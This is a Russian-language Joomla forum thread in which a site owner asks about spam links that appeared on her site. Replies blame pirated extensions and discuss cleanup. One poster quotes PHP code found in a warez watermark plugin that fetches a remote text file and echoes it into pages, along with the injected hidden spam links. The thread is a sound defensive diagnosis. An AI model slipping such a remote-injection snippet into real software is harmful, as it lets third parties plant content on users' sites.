0 Пользователей и 1 Гость просматривают эту тему.
  • 25 Ответов
  • 2322 Просмотров
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Заметили на сайте левый текст

<div style="/* position: absolute; *//* top: -1000px; */">
Калькулятор расчета пеноблоков смотрите <a href="http://fortstroi.com.ua/stroitelstvo/stati/item/2003-raschet-kolichestva-penoblokov-online-kalkulyator">на этом ресурсе</a><br>
Все о каркасном доме можно найти здесь <a href="http://stroidom-shop.ru/svoimi-rukami/karkasnyiy-dom-6x6.html">http://stroidom-shop.ru</a><br>
Что лучше инжектор или карбюратор? Подробнее на странице <a href="http://kamael.com.ua/1/sovety-avtomobilistam/327-inzhektor-ili-karbyurator-chto-luchshe">http://kamael.com.ua</a>
</div>

откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !

Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Появился левый текст на сайте
« Ответ #1 : 22.03.2017, 15:21:34 »
Вы расширения ставили с официальных источников?
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #2 : 22.03.2017, 15:38:53 »
Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
опять Joomla виновата :) ох уж эта Joomla :)

Вы расширения ставили с официальных источников?
если бы хотя бы все пытались сначала разобраться, где же они, эти официальные источники... а то встретился - надо качать срочно, пока есть. потом же не будет :) а что это, откуда, что внутри... кто об этом думает? :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #3 : 22.03.2017, 15:50:53 »
Вы расширения ставили с официальных источников?

я не помню ) я даже не заметила когда это появилось
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Появился левый текст на сайте
« Ответ #4 : 22.03.2017, 16:00:47 »
откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !
Обычно появлется после запуска сайта, может через какое то время, не сразу. Почему, читайте здесь: Не используйте варез!

В двух словах - когда вы качаете расширения с разных варезников, новомодных складчин и т.д., в них присутствует такой код. Он дает возможность третьим лицам зарабатывать на вашем сайте. В шаблоне он или еще где, данный код надежно спрятан. И теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой. Бесплатный сыр, он такой... Сначала сладкий, а потом - диарея.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #5 : 22.03.2017, 16:50:33 »
теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой
ага. а забить на это - это значит и на сайт забить. потому что он с поисковиков вывалится с таким содержанием, и толку с него будет... :)

я не помню ) я даже не заметила когда это появилось
вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? :) нельзя же так... теперь вот деньги платить, лечить...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Появился левый текст на сайте
« Ответ #6 : 22.03.2017, 16:58:38 »
вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? :) нельзя же так... теперь вот деньги платить, лечить...
Кто ж знает...
IT-бомж, может
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #7 : 23.03.2017, 08:48:29 »
Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Появился левый текст на сайте
« Ответ #8 : 23.03.2017, 09:29:51 »
Вы не представляете количество людей, которое тут выстроится так-же на халяву лечить сайты, а потом снова пойдёт качать шаблончик откуда-нибудь там. Но им помочь не смогут, т.к. нет волшебного антивируса, всё чистящего. Это нужно с красными глазами залазить на несколько часов и пересматривать кучу файлов, сравнивать с чистой Joomla и чистыми расширениями, проверять шаблон и не факт, что с первого раза найдешь всё, а зараза расползается по новой. А она там впихнута не просто текстом, они там её и шифруют и скриптами подгружают, чего только не выдумывают. В общем всё сделали для того, чтобы новичку ни в жизнь было самому не разобраться и профи тоже помучился. Поэтому и остаётся только поучать народ.
Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
« Последнее редактирование: 23.03.2017, 09:35:19 от ChaosHead »
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Появился левый текст на сайте
« Ответ #9 : 23.03.2017, 10:10:13 »
Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
Мы вам и стараемся помочь, отвечая на ваши вопросы и детально разжовывая возникшую у вас ситуацию. Теперь вы знаете ответы на вопросы "почему", "откуда", "зачем" и "что делать". Собственно это все, что мы можем для вас в данной ситуации сделать. Хотите удалить гадость с сайта? Придется платить либо делать сайт заново, как сказал ChaosHead, ибо нет такого антивируса, способного анализировать код, нужен даже не знаток PHP, а специалист, знающий, что именно нужно искать.

Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
И то не факт.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #10 : 23.03.2017, 10:34:27 »
Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
само собой нет. невозможно к сожалению родится сразу такими умными. сначала были тупые. а потом начали читать всякую фигню, что другие пишут, и стали умными :) и у вас получится, если захотите, я уверен. только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится :)

а по поводу помочь - к сожалению вам тут ничем не поможешь более, кроме как указать путь в коммерческий раздел. потому что сами вы сайт все равно не вылечите. ну или как уже сказали полностью удаляйте его, и делайте заново, на расширениях скачанных только с официальных источников
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #11 : 23.03.2017, 10:48:51 »
только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится :)

Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Re: Появился левый текст на сайте
« Ответ #12 : 23.03.2017, 12:09:54 »
Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
На самом деле, вы не одна такая, не скажу что большинство, но многие на эти грабли наступали. Что же до решения, то у новичка их три.
1. Обратиться к специалисту. За относительно не маленькую сумму, вам сайт почистят (скупой платит дважды)
2. Стереть сайт и создать заного. На самом деле даже специалист может прийти к такому выводу ибо иногда проще сайт пересобрать чем пытаться вычистить. (откат от бэкапа не всегда выход ибо, как я понял вы не знаете что именно привело к заражению)
3. Научиться, вариант конечно самый лучший, но чтобы этому научиться мало выучить языки программирования, надо знать специфику + всегда быть в "тренде", а на это могут уйти годы.

Так что если время, силы и знания позволяют, то самый эконом вариант пересобрать сайт целиком. Ну и выучить простейшие правила.
1. Ни каких варезов. Поймите ломать винду и раздавать ее нахалву народу - это хобби. А варез для сайтов - это бизнес.
2. На всегда должны быть акт ильные версии дивжка и расширений.
3. Обновляться быстро. Иногда уже через час, а то и меньше после выхода обновления  начинают бить по уязвимости.
4. Всегда следить за сайтом. в частности за изменениями в файлах. Поймав момент заражения, устранить причину и последствия куда легче.
Ну вот как-то так.
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Появился левый текст на сайте
« Ответ #13 : 23.03.2017, 13:33:10 »
3. Научиться
Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #14 : 23.03.2017, 13:56:20 »
Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Re: Появился левый текст на сайте
« Ответ #15 : 23.03.2017, 17:49:34 »
Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
Ну я php для одного сайта изучал=)
Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.

Только причину вы не убрали =)
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #16 : 23.03.2017, 18:26:40 »
Только причину вы не убрали =)
99% что так и есть. убрано следствие, но не причина. через время все будет точно также, как и было. хотя конечно маленький шанс, что были только ссылки и ничего больше, все же остается :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #17 : 24.03.2017, 09:17:24 »
Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Появился левый текст на сайте
« Ответ #18 : 24.03.2017, 12:20:10 »
Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #19 : 24.03.2017, 13:01:05 »
ого... я тоже хочу... :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipopo

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Появился левый текст на сайте
« Ответ #20 : 24.03.2017, 13:13:24 »
я все таки надеюсь на лучшее  ::)
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Re: Появился левый текст на сайте
« Ответ #21 : 24.03.2017, 18:36:47 »
Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
А я думал червичок личинки отложил =)
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

Bowa

  • Захожу иногда
  • 363
  • 5 / 0
Re: Появился левый текст на сайте
« Ответ #22 : 29.06.2017, 13:44:16 »
Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #23 : 30.06.2017, 07:25:20 »
это есть именно в исходнике, или уже у вас на сайте?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Появился левый текст на сайте
« Ответ #24 : 30.06.2017, 08:08:59 »
Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
Логично. Скачано же с варезника!
Обсуждение вареза запрещено!
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Появился левый текст на сайте
« Ответ #25 : 30.06.2017, 13:52:52 »
а, понятно. не заходил на сам сайт, не видел что это варезник. ну тогда да, все логично. тогда там может и не только это. и уже может и не только там :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

На сайте появились ошибки

Автор Hocotih

Ответов: 0
Просмотров: 594
Последний ответ 13.05.2021, 10:24:20
от Hocotih
Где на сайте находится адрес для уведомлений(платежной системы)? Сейчас адрес д

Автор Марина-6

Ответов: 0
Просмотров: 809
Последний ответ 23.06.2020, 10:57:10
от Марина-6
Отзывы на сайте не публикуются(не выводятся )

Автор Марина-6

Ответов: 1
Просмотров: 822
Последний ответ 21.06.2020, 00:36:29
от wishlight
Нужна помощь! На сайте выдаёт ошибку: Ошибка 310 (net::ERR_TOO_MANY_REDIRECTS) циклическая переадр

Автор ABOC

Ответов: 4
Просмотров: 4642
Последний ответ 13.01.2020, 16:11:00
от Katya1212
Ошибка на сайте нужна помощь по php

Автор vdv1979

Ответов: 7
Просмотров: 2721
Последний ответ 23.11.2019, 09:41:33
от Elimelech